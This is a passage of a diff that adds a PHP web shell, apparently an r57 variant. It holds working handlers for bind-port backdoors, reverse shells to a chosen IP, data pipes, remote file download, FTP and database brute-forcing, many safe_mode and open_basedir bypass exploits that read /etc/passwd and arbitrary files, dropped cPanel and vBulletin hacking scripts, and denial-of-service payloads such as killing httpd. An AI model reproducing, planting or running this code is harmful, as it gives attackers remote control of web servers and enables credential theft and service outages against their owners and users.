+ elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };}
+ else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ if(!empty($_POST['cmd'])) 
+ {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars($filedump);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>";
+ echo "<input type=hidden name=dir value='".$dir."'>";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ morewrite($_POST['e_name'],$_POST['e_text']);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ @touch($_POST['e_name'],$mtime,$mtime);
+ }
+ 
+
+
+if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
+{
+ cf($tempdir.'prxpl',$prx_pl);
+ $p2=which("perl");
+ $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &');
+ @unlink($tempdir.'prxpl');
+ $_POST['cmd']="ps -aux | grep prxpl";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf($tempdir.'bd.c',$port_bind_bd_c);
+ $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c');
+ @unlink($tempdir.'bd.c');
+ $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &');
+ @unlink($tempdir.'bd');
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf($tempdir.'bdpl',$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &');
+ @unlink($tempdir.'bdpl');
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf($tempdir.'back',$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &');
+ @unlink($tempdir.'back');
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf($tempdir.'back.c',$back_connect_c);
+ $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c');
+ @unlink($tempdir.'back.c');
+ $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &');
+ @unlink($tempdir.'back');
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf($tempdir.'dp',$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &');
+ @unlink($tempdir.'dp');
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf($tempdir.'dpc.c',$datapipe_c);
+ $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c');
+ @unlink($tempdir.'dpc.c');
+ $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &');
+ @unlink($tempdir.'dpc');
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+
+
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+
+
+for($upl=0;$upl<=16;$upl++)
+{
+ if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
+  if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
+  else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
+  @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
+  or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
+ }
+}
+if (!empty($_POST['port1']))
+{
+ cf("bds",$port_bind_bd_cs);
+ $blah = ex("chmod 777 bds");
+ $blah = ex("./bds ".$_POST['port1']." &");
+ $_POST['cmd']="echo \"Now script install backdoor connect to port ";
+  }else{
+cf("/tmp/bds",$port_bind_bd_cs);
+ $blah = ex("chmod 777 bds");
+ }
+if (!empty($_POST['php_ini1']))
+{
+ cf("php.ini",$egy_ini);
+  $_POST['cmd']=" now  make incloude for file ini.php and add ss and your shell";
+ }
+
+
+ if (!empty($_POST['htacces']))
+{
+ cf(".htaccess",$htacces);
+  $_POST['cmd']="now .htaccess has been add";
+ }
+  if (!empty($_POST['egy_res']))
+{
+ cf(".ini.php",$egy_res);
+  $_POST['cmd']="now .htaccess has been add";
+ }
+  if (!empty($_POST['egy_ini']))
+{
+ cf("ini.php",$egy_ini);
+ 
+
+
+  $_POST['cmd']=" http://target.com/ini.php?egy=http://shell.txt? add ss ini.php now  make incloude for file ini.php and add egy and your shell";
+ }
+
+
+ if (!empty($_POST['egy_cp']))
+{
+ cf("pass_cpanel.php",$egy_cp);
+  $_POST['cmd']="cpanel add";
+ }
+
+
+ if (!empty($_POST['egy_vb']))
+{
+ cf("vb_hacker.php",$egy_vb);
+  $_POST['cmd']="Added Following Files .htaccess & ini.php & vb_hacker.php & pass_cpanel.php ";
+ }
+ 
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+
+
+for($upl=0;$upl<=16;$upl++)
+{
+
+
+}
+
+
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case 'fopen':
+ $datafile = @implode("", @file($_POST['rem_file']));
+ if($datafile)
+  {
+   if(!morewrite($_POST['loc_file'],$datafile)){ err(0);};
+  }
+
+
+ $_POST['cmd'] = '';
+ break;
+ case 'wget':
+ $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\"";
+ break;
+ case 'fetch':
+ $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
+ break;
+ case 'lynx':
+ $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
+ break;
+ case 'links':
+ $_POST['cmd'] = which('links')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
+ break;
+ case 'GET':
+ $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
+ break;
+ case 'curl':
+ $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else 
+  {   
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else 
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+
+
+if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
+ {
+ if($_POST['cmd']=="ftp_brute"){
+  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+  if(empty($ftp_port)) { $ftp_port = 21; }
+  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ }else if($_POST['cmd']=="db_brute"){
+   $connection = 1;
+ }
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
+ }
+
+
+echo $table_up3;
+if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+ 
+  if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
+   {
+   foreach ($d as $file)
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
+      $owner = @posix_getpwuid($uid);
+      $grgid = @posix_getgrgid($gid);
+     }else{$owner['name']=$grgid['name']='';}
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo @date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   }
+
+
+  elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
+      $owner = @posix_getpwuid($uid);
+      $grgid = @posix_getgrgid($gid);
+     }else{$owner['name']=$grgid['name']='';}
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo @date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+   
+  elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
+   {
+   while (false!==($file=@readdir($d)))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
+      $owner = @posix_getpwuid($uid);
+      $grgid = @posix_getgrgid($gid);
+     }else{$owner['name']=$grgid['name']='';}
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo @date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   @closedir($d);
+   }
+
+
+   elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath'])))
+    {
+       echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n";
+       function eh($errno, $errstr, $errfile, $errline)
+        {
+          global $D, $c, $i; 
+          preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); 
+          if($o){ $D[$c] = $o[2]; $c++;} 
+        }
+       $error_reporting = @ini_get('error_reporting');
+       error_reporting(E_WARNING); 
+       @ini_set("display_errors", 1); 
+       @ini_alter("display_errors", 1); 
+       $root = "/"; 
+       if($dir) $root = $dir; 
+       $c = 0; $D = array(); 
+       @set_error_handler("eh"); 
+       $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 
+       for($i=0; $i < strlen($chars); $i++)
+       {
+        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; 
+        $prevD = $D[count($D)-1]; 
+        @glob($path."*"); 
+        if($D[count($D)-1] != $prevD)
+         {
+           for($j=0; $j < strlen($chars); $j++)
+           {
+            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; 
+            $prevD2 = $D[count($D)-1]; 
+            @glob($path."*"); 
+            if($D[count($D)-1] != $prevD2)
+             {
+              for($p=0; $p < strlen($chars); $p++)
+               {
+                $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; 
+                $prevD3 = $D[count($D)-1]; 
+                @glob($path."*"); 
+                if($D[count($D)-1] != $prevD3)
+                 {
+                  for($r=0; $r < strlen($chars); $r++)
+                   {
+                    $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; 
+                    @glob($path."*"); 
+                   } 
+                 }        
+               } 
+             }        
+           }    
+         } 
+       } 
+       $D = array_unique($D); 
+       foreach($D as $item) echo "{$item}\r\n"; 
+       echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
+       error_reporting($error_reporting);
+    }
+    elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath'])))
+    {
+       echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
+       if(!$dir){$dir='/etc/';}; 
+       if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
+       if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
+
+
+       if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
+       if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
+       foreach($presets_rlph as $preset_rlph){
+           if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
+       }
+       for($i=0; $i < strlen($chars_rlph); $i++){
+          if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
+          if($n_rlph<=1){continue;};
+          for($j=0; $j < strlen($chars_rlph); $j++){
+             if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
+             if($n_rlph<=2){continue;};
+      	     for($x=0; $x < strlen($chars_rlph); $x++){
+                if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
+                if($n_rlph<=3){continue;};
+                for($y=0; $y < strlen($chars_rlph); $y++){
+      	           if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
+      	           if($n_rlph<=4){continue;};
+      	           for($z=0; $z < strlen($chars_rlph); $z++){
+      	              if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
+      	              if($n_rlph<=5){continue;};
+      	              for($w=0; $w < strlen($chars_rlph); $w++){
+      	                 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
+      		      }
+      		   }
+      	         }
+              }
+          }
+       }
+       echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
+    }	
+    else echo $lang[$language.'_text29'];
+ break;
+ 
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']);
+  $cf = @curl_exec($ci);
+  echo htmlspecialchars($cf);
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+     @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
+/*     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/
+     @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_r57_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo htmlspecialchars($row[0])."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  $temp=tempnam($dir, "fname");
+  if (@file_exists($temp)) @unlink($temp);
+  $extra = "-C ".$_POST['test5_file']." -X $temp";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $str = moreread($temp);
+  echo htmlspecialchars($str);
+  @unlink($temp);
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo htmlspecialchars($str);
+  @imap_close($stream);
+  break;
+  case 'test8':
+  $temp=@tempnam($_POST['test8_file2'], "copytemp");
+  $str = readzlib($_POST['test8_file1'],$temp);
+  echo htmlspecialchars($str);
+  @unlink($temp);
+  break;
+  
+  case 'test9':
+  @ini_restore("safe_mode");
+  @ini_restore("open_basedir");
+  $str = moreread($_POST['test9_file']);
+  echo htmlspecialchars($str);
+  break;
+  case 'test10':
+  @ob_clean();
+  $error_reporting = @ini_get('error_reporting');
+  error_reporting(E_ALL ^ E_NOTICE);
+  @ini_set("display_errors", 1); 
+  @ini_alter("display_errors", 1); 
+  $str=@fopen($_POST['test10_file'],"r");
+  while(!feof($str)){print htmlspecialchars(fgets($str));}
+  fclose($str);
+  error_reporting($error_reporting);
+  break;
+  case 'test11':
+  @ob_clean();
+  $temp = 'zip://'.$_POST['test11_file'];
+  $str = moreread($temp);
+  echo htmlspecialchars($str);
+  break;
+  case 'test12':
+  @ob_clean();
+  $temp = 'compress.bzip2://'.$_POST['test12_file'];
+  $str = moreread($temp);
+  echo htmlspecialchars($str);
+  break;
+  case 'test13':
+  @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
+  echo $lang[$language.'_text61'];
+  break;
+  case 'test14':
+  @session_save_path($_POST['test14_file2']."\0;$tempdir");
+  @session_start();
+  @$_SESSION[php]=$_POST['test14_file1'];
+  echo $lang[$language.'_text61'];
+  break;
+  case 'test15':
+  @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
+  echo $lang[$language.'_text61'];
+  
+    break;
+  case 'test_5_2_6':
+echo getcwd()."\n";
+chdir($_POST['test_5_2_6']);
+echo getcwd()."\n";
+  break;
+  
+  
+    case 'test2_5_2_6':
+var_dump(posix_access($_POST['test15_file1']));
+
+
+  break;
+  
+      case 'test_5_2_4':
+//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass
+
+
+//author: shinnai
+//mail: shinnai[at]autistici[dot]org
+//site: http://shinnai.altervista.org
+
+
+//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
+
+
+//Technical details:
+//ionCube version: 6.5
+//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)
+//url: www.egyspider.eu
+
+
+//php.ini settings:
+//safe_mode = On
+//disable_functions = ioncube_read_file, readfile
+
+
+//Description:
+//This is useful to obtain juicy informations but also to retrieve source
+//code of php pages, password files, etc... you just need to change file path.
+//Anyway, don't worry, nobody will read your obfuscated code :)
+
+
+//greetz to: BlackLight for help me to understand better PHP
+
+
+//P.S.
+//This extension contains even an interesting ioncube_write_file function...
+
+
+if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!  You are now can establish any order");
+
+
+$path = str_repeat("..\\", 20);
+
+
+$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :)
+
+
+$MyBoot_ioncube = ioncube_read_file($path."boot.ini");
+
+
+echo $MyBoot_readfile;
+
+
+echo "<br><br>ionCube output:<br><br>";
+
+
+echo $MyBoot_ioncube;
+  break;
+  
+  
+  
+      case 'egy_perl':
+if(!extension_loaded('perl'))die('perl extension is not loaded');
+if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
+if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
+$perl=new perl();
+echo "<textarea rows='25' cols='75'>";
+$perl->eval("system('".$_GET['cmd']."')");
+echo "</textarea>";
+$_GET['cmd']=htmlspecialchars($_GET['cmd']);
+  break;
+  
+      break;
+  case 'egy_4_2_0':
+    for ($i = 0; $i < 60000; $i++)
+      {
+        if (($tab = @posix_getpwuid($i)) != NULL)
+          {
+            echo $tab['name'].":";
+            echo $tab['passwd'].":";
+            echo $tab['uid'].":";
+            echo $tab['gid'].":";
+            echo $tab['gecos'].":";
+            echo $tab['dir'].":";
+            echo $tab['shell']."<br>";
+          }
+      }
+  break;
+
+
+
+
+  case 'egy_5_2_3':
+//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
+
+
+//author: egy spider
+//mail: egy_spider@hotmail.com
+//site: http://egyspider.eu
+
+
+//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
+
+
+//Thanks to rgod for all his precious advises :)
+
+
+//I set php.ini in this way:
+//safe_mode = On
+//disable_functions = system
+//if you launch the exploit from the cli, cmd.exe will be wxecuted
+//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager
+
+
+if (!extension_loaded("win32std")) die("win32std extension required!");
+system("cmd.exe"); //just to be sure that protections work well
+win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
+  break;
+
+
+  break;
+  
+  
+  case 'test16':
+  if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
+  break;
+  case 'test17_1':
+  @unlink('symlinkread');
+  @symlink('a/a/a/a/a/a/', 'dummy');
+  @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
+  @unlink('dummy');
+  while (1) 
+   {
+    @symlink('.', 'dummy');
+    @unlink('dummy');
+   }
+  break;
+  case 'test17_2':
+  $str='';
+  while (strlen($str) < 3) {   
+/*   $str = moreread('symlinkread');*/
+   $str = @file_get_contents('symlinkread');
+   if($str){ @ob_clean(); echo htmlspecialchars($str);}
+  }
+  break;
+  case 'test17_3':
+  $dir = $files = array();
+  if(@version_compare(@phpversion(),"5.0.0")>=0){
+   while (@count($dir) < 3) {
+    $dir=@scandir('symlinkread');
+    if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
+   }
+  }
+  else {
+   while (@count($files) < 3) {
+    $dh  = @opendir('symlinkread');
+    while (false !== ($filename = @readdir($dh))) {
+     $files[] = $filename;
+    }
+    if(@count($files) > 2){@ob_clean(); @print_r($files); }
+   }
+  }
+  break;
+  case 'test18':
+  @putenv("TMPDIR=".$_POST['test18_file2']); 
+  @ini_set("session.save_path", ""); 
+  @ini_alter("session.save_path", ""); 
+  @session_start();
+  @$_SESSION[php]=$_POST['test18_file1'];
+  echo $lang[$language.'_text61'];
+  break;
+  case 'test19':
+  if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; }
+  $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']);
+  if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;};
+  $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
+  $m->set_local_infile_handler("r");
+  $m->query("DROP TABLE IF EXISTS temp_r57_table");
+  $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )");
+  $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table");
+  $r = $m->query("SELECT * FROM temp_r57_table");
+  while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
+  $m->query("DROP TABLE IF EXISTS temp_r57_table");
+  $m->close();
+  break;
+ }
+}
+
+
+if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }
+}/*elseif($safe_mode){
+ $cmd_rep = safe_ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }
+}
+*/
+
+
+switch($_POST['cmd'])
+{
+ case 'dos1':
+ function a() { a(); } a();
+ break;
+ case 'dos2':
+ @pack("d4294967297", 2);
+ break;
+ case 'dos3':
+ $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
+ break;
+ case 'dos4':
+ $t = array(1);while (1) {$a[] = &$t;};
+ break;
+ case 'dos5':
+ @dl("sqlite.so");$db = new SqliteDatabase("foo");
+ break;
+ case 'dos6':
+ preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
+ break;
+ case 'dos7':
+ @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
+ break;
+ case 'dos8':
+ @shell_exec("killall -11 httpd");
+ break;
+ case 'dos9':
+ function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx();
+ break;
+ case 'dos10':
